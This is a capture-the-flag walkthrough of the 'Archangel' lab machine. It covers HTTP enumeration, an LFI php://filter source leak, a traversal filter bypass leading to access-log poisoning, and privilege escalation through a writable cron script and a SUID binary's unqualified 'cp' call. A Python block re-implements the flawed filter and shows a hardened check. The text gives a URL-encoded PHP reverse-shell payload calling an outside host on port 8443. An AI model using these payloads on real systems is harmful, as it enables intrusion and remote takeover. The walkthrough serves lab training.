Archangel

Target IP: 10.10.159.156
New IP after reverting: 10.10.83.159

A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.


Reconnaissance

[screenshot: port scan results]
There are two TCP ports open on the target machine: SSH and HTTP. I will start enumeration with the HTTP application on port 80.


Enumeration

Port 80: HTTP

[screenshot]
The webpage above is displayed for this web application. I did not find anything useful when viewing the source code of the webpage. The email support@mafialive.thm is interesting. Is mafialive.thm a VHOST? Adding it to the /etc/hosts file shows that it is.

[screenshot]
Now browsing to http://mafialive.thm displays the webpage above.

[screenshot: gobuster output]
Doing a directory search against this host with the command gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirb/big.txt -x php,html,txt shows the entries above. The test.php sounds interesting.

[screenshot]
Browsing to this test.php displays the webpage above.

[screenshot]
Pressing the button Here is a button displays the message above. A new URL parameter called view gets appended too.

[screenshot]
I used ffuf to perform LFI fuzzing, but I did not find anything useful. However, I managed to read the source code of mrrobot.php using a PHP filter. I should be able to read test.php using the same PHP filter.

[screenshot]
And bingo! Using the payload http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php, I obtained the source code of test.php in base64. Time to decode this.

[screenshot: decoded test.php source]
Decoding the base64 string of the test.php source code shows the content above. There are two conditions set:

  1. The user input should not contain ../../
  2. The user input must contain /var/www/html/development_testing

[screenshot]
Time to create a payload to bypass the filtering in place. Using the payload http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log, I now have access to the access.log file for poisoning. I had to revert this machine because I tried poisoning this file and it did not work. The new IP for this machine is 10.10.83.159.
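To show why the two substring checks listed above do not hold and what a check that resolves the path first looks like, here is an added Python re-implementation; it is not the page's PHP (which the writeup only shows in a screenshot), and WEBROOT, weak_filter_allows, resolve_view and hardened_filter_allows are names chosen for this example.

```python
import posixpath

# Directory the writeup says test.php requires in the view parameter.
WEBROOT = "/var/www/html/development_testing"


def weak_filter_allows(view: str) -> bool:
    """The two substring checks the writeup lists for test.php.

    1. the input must not contain '../../'
    2. the input must contain WEBROOT
    Both look at the raw string, so any spelling of 'go up one level'
    that is not literally '../../' (e.g. '.././../') passes check 1.
    """
    return "../../" not in view and WEBROOT in view


def resolve_view(view: str, base: str = WEBROOT) -> str:
    """Collapse '.' and '..' segments and return the path actually opened.

    posixpath.join keeps an absolute `view` as-is and anchors a relative
    one under `base`. normpath is used so the example runs offline; on a
    real server use os.path.realpath so symlinks are resolved as well.
    """
    return posixpath.normpath(posixpath.join(base, view))


def hardened_filter_allows(view: str, base: str = WEBROOT) -> bool:
    """Allow only paths that still sit under `base` after resolution.

    Stream wrappers such as php://filter contain ':' and are rejected
    outright, which also blocks the base64 source-disclosure trick.
    """
    if ":" in view or "\x00" in view:
        return False
    resolved = resolve_view(view, base)
    return resolved == base or resolved.startswith(base + "/")


if __name__ == "__main__":
    # Constructed samples mirroring the requests in the writeup.
    bypass = WEBROOT + "/.././.././../log/apache2/access.log"
    print(weak_filter_allows(bypass), resolve_view(bypass))       # True /var/log/apache2/access.log
    print(hardened_filter_allows(bypass))                          # False
```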

[screenshot]
I poisoned the access.log file with the payload highlighted in the image above.

[screenshot]
And success! Sending the commands id;whoami;ls returned the output above. Time to obtain a reverse shell connection.


Exploitation

[screenshot]
Since the target machine is using PHP, I sent a PHP reverse shell script to obtain a reverse shell connection. I deployed the payload php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 and received a reverse shell connection on my machine on port 8443. Now I have a foothold on the target machine.


Privilege Escalation

[screenshot]
Running the command find / -writable -type f 2>/dev/null shows the interesting entry /opt/helloworld.sh, as shown above.

[screenshot: crontab entry]
And there is an interesting cron job, /opt/helloworld.sh, that is executed as archangel. I have write privileges over it.

[screenshot]
I put my bash reverse shell script inside helloworld.sh. Then I received a reverse shell connection on my machine on port 8444 with a session as archangel. I successfully moved horizontally from www-data to archangel.

[screenshot]
The binary backup at /home/archangel/secret has the SUID bit set, and the user archangel can execute it.

[screenshot: strings output]
Running strings on this binary shows the interesting code above. It is copying the contents of home/user/archangel/myfiles/* to /opt/backupfiles. But the copy binary is used without an absolute path, so I can create a malicious version of it.

[screenshot]
I created a malicious version of the copy binary in tmp that invokes a reverse shell connection to my machine on port 8445. Then, executing the binary backup, I received a root reverse shell connection on port 8445. Now I have root access.


Flags

[screenshot]
The user.txt flag, which is located in archangel's home directory.

[screenshot]
The user2.txt flag after gaining access to the target machine as archangel.

[screenshot]
The root.txt flag.